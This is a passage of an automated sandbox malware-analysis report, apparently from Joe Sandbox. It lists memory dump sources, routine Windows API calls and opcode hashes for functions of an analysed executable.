                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: a09db7801140b5ec74778162213da97470f7e5174ddff8ab8d989ac7a3cb09ca
                                                                    • Instruction ID: bb01dc54bb1942f6df19df6c674861e46608a5baa59e7cd01eb6b760656e51df
                                                                    • Opcode Fuzzy Hash: a09db7801140b5ec74778162213da97470f7e5174ddff8ab8d989ac7a3cb09ca
                                                                    • Instruction Fuzzy Hash: 40F0BE71182B028EDF308E24D848792B3E4AB12329F081B1ED0E7429E0D360A98D96A1
                                                                    APIs
                                                                      • Part of subcall function 00D9C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C4E6
                                                                      • Part of subcall function 00D9C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?), ref: 00D9C516
                                                                      • Part of subcall function 00D9C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A), ref: 00D9C522
                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C3A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1464966427-0
                                                                    • Opcode ID: fb4061e462243a58535335fa4f7e63a6fa4e882ed3c6ead4b4153cc5c0dd8111
                                                                    • Instruction ID: 234ed2276895c6d8616db7027e02640fe4a8232c1649e2f55c9eaf8b1c8962dc
                                                                    • Opcode Fuzzy Hash: fb4061e462243a58535335fa4f7e63a6fa4e882ed3c6ead4b4153cc5c0dd8111
                                                                    • Instruction Fuzzy Hash: B0F08235018790ABCF221BB45905BC67B909F2A332F04CB4AF1FE52192C6B560949B32
                                                                    APIs
                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00DA2F19
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ExecutionStateThread
                                                                    • String ID:
                                                                    • API String ID: 2211380416-0
                                                                    • Opcode ID: cff8c40114ae7f4a564b71b170788afe1e9065d91c5db190f282e063a40e56c8
                                                                    • Instruction ID: 93ce72ce96357e42d9eeb4c87ae4230039157650337c97b8830b6e96cea80737
                                                                    • Opcode Fuzzy Hash: cff8c40114ae7f4a564b71b170788afe1e9065d91c5db190f282e063a40e56c8
                                                                    • Instruction Fuzzy Hash: B2D05B11A1921159DB16372A7C06BFD16579FC3325F5C0067B109B77C78B5A0C8293F2
                                                                    APIs
                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00DAC5BC
                                                                      • Part of subcall function 00DAC34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DAC36E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                    • String ID:
                                                                    • API String ID: 1915507550-0
                                                                    • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                    • Instruction ID: b0d4038b278f219354eed9d15d6970b22e3c2d2140a8b570ba29d1c864bfc11b
                                                                    • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                    • Instruction Fuzzy Hash: 53D0A731624249F6DF026B20CC0297E7594DB01350F0080217842C9180FDB1DA106971
                                                                    APIs
                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00DB01A4
                                                                      • Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
                                                                      • Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
                                                                      • Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
                                                                      • Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
                                                                      • Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                    • String ID:
                                                                    • API String ID: 897784432-0
                                                                    • Opcode ID: e99e4a52df2814dbdc34ab4a234f653896a0d140130737c7ad2db21bb645060c
                                                                    • Instruction ID: e80afdce7e9b7d0c36168c61aa1580d6445a73bdb2e76d45c181260c306007a7
                                                                    • Opcode Fuzzy Hash: e99e4a52df2814dbdc34ab4a234f653896a0d140130737c7ad2db21bb645060c
                                                                    • Instruction Fuzzy Hash: 6CD09E31158300AAD6012B56CD06F1A7AA2FB99F05F404555B289740F186629D31EB36
                                                                    APIs
                                                                    • DloadProtectSection.DELAYIMP ref: 00DB0AC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: DloadProtectSection
                                                                    • String ID:
                                                                    • API String ID: 2203082970-0
                                                                    • Opcode ID: 716029338f65cce6ca1a055a2244021b04aa7059c11cb70fa4fd58304a7c27cc
                                                                    • Instruction ID: bb80601fe98a2f24133bb501e66f398998e455c10271dc38d52c451bce90fa7b
                                                                    • Opcode Fuzzy Hash: 716029338f65cce6ca1a055a2244021b04aa7059c11cb70fa4fd58304a7c27cc
                                                                    • Instruction Fuzzy Hash: EED0C730502755DDC211A754AC8A7B62D50F308704F554444BA47D6198DFB05480D535
                                                                    APIs
                                                                    • GetFileType.KERNELBASE(000000FF,00D9B18A,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B294
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID:
                                                                    • API String ID: 3081899298-0
                                                                    • Opcode ID: 1de369f6d6cd5d241a0c4545f1fd32e839330bdab05cd23a82fb80f3a3ddecea
                                                                    • Instruction ID: 32fa3bb1862dac72915821b94843b8f58f211348320cc8fa87e0514d3e506b07
                                                                    • Opcode Fuzzy Hash: 1de369f6d6cd5d241a0c4545f1fd32e839330bdab05cd23a82fb80f3a3ddecea
                                                                    • Instruction Fuzzy Hash: 29C01234000105954F304724AA4545C7311DE523767B98295C028C90A1C323CC43F624
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00D96B77
                                                                      • Part of subcall function 00DA11A5: __EH_prolog3.LIBCMT ref: 00DA11AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: 1e17d8939ac3d97c5d675b32a9c03de6cb47101ca00d8e2f07b87d0ec10cb14b
                                                                    • Instruction ID: 1e08c9734f0931834b29737b6ccb419445cda7d2952c76ead647b1511c77af8a
                                                                    • Opcode Fuzzy Hash: 1e17d8939ac3d97c5d675b32a9c03de6cb47101ca00d8e2f07b87d0ec10cb14b
                                                                    • Instruction Fuzzy Hash: 74C012A8F0462283FB12B7A4842339C60A0EF44B05F800059F201AB382CBB80B0187BE
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: c0a13808c17bad19d58de2949f3480448c199ef6f762a16098bb1eff2b951cf9
                                                                    • Instruction ID: 7b3ec339c49e896e16f3d41b71d4bb5ff02ef9f7da076dd40c0222ef6aa52b33
                                                                    • Opcode Fuzzy Hash: c0a13808c17bad19d58de2949f3480448c199ef6f762a16098bb1eff2b951cf9
                                                                    • Instruction Fuzzy Hash: 49B09285258242ED224852485802DFB060CC1C0B10321C52AF00AC1280944058590031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 7635da4639a15625b127b48e1dfe8bdc5b7ff4dfc16d4bd4aa68302940005943
                                                                    • Instruction ID: b40fdfadbf95f50ad6bd5bcfa1fa89a398bd92649e3d0160fc8e34ab3bb3433d
                                                                    • Opcode Fuzzy Hash: 7635da4639a15625b127b48e1dfe8bdc5b7ff4dfc16d4bd4aa68302940005943
                                                                    • Instruction Fuzzy Hash: 40B0128635C203FD310857485C02DFF060CC1C0B10331C43FF40EC1280D4405C0D0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 535368b95725fdfc0c3999f18de69d908b80367acd933c9fe4bc317e8d874a89
                                                                    • Instruction ID: 07be736a3142e31b6ad90111d1e1585b74c70158be62083366b26b76cb32497b
                                                                    • Opcode Fuzzy Hash: 535368b95725fdfc0c3999f18de69d908b80367acd933c9fe4bc317e8d874a89
                                                                    • Instruction Fuzzy Hash: 99B0128935C307FD310453485C02DFF060CE1C0B10331C43FF00AC1280D4405C090131
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 450b0bcb53876a2b7ed150e86e4d91622d3e0daa2aed0c1c1843c8c5223cade8
                                                                    • Instruction ID: dfdd9bf332d9b32de636f375c1aab3477e7b2a76327c5c98205bfd17ed9e8885
                                                                    • Opcode Fuzzy Hash: 450b0bcb53876a2b7ed150e86e4d91622d3e0daa2aed0c1c1843c8c5223cade8
                                                                    • Instruction Fuzzy Hash: 6AB0129535C203FD310457485C02DFF060CC1C1B10331D43FF40AC1180D4405E090031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 99d37bbec93c10ae79bd774f372f5ac0f90adbe4634c82aa72eabbbd8f2b593e
                                                                    • Instruction ID: f4090df010ef3a516f601ef1689b1f067c54a118c3944549b22cdfd33bdafa70
                                                                    • Opcode Fuzzy Hash: 99d37bbec93c10ae79bd774f372f5ac0f90adbe4634c82aa72eabbbd8f2b593e
                                                                    • Instruction Fuzzy Hash: BEB0128535C203FD310853985C02DFF060CD1C0B10331C83FF00EC1280D4405C0D0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 46c2c5ef12acb33f783c93de270cbac284f25678969f97cb77d476754a40591c
                                                                    • Instruction ID: 7cea471cc390ba37adf6d007bd3e4b360c1279c5e1ddb404c8d461d925b6c99a
                                                                    • Opcode Fuzzy Hash: 46c2c5ef12acb33f783c93de270cbac284f25678969f97cb77d476754a40591c
                                                                    • Instruction Fuzzy Hash: A1B0128535C203FD310853485D02DFF060CC1C0B10331C47FF40EC1280D4405D1E0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: dd00758eaebc71a11d772960aa8e4b687614ed5645be1141f17f0df38fb3c223
                                                                    • Instruction ID: f735899e035a046ca5628495ad97bc0115835defb89923bb4c54919ba9357149
                                                                    • Opcode Fuzzy Hash: dd00758eaebc71a11d772960aa8e4b687614ed5645be1141f17f0df38fb3c223
                                                                    • Instruction Fuzzy Hash: D9B0128535C203FD31045348AD02DFF061CC1D0B10331C67FF40AC1180D4405D1B0031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
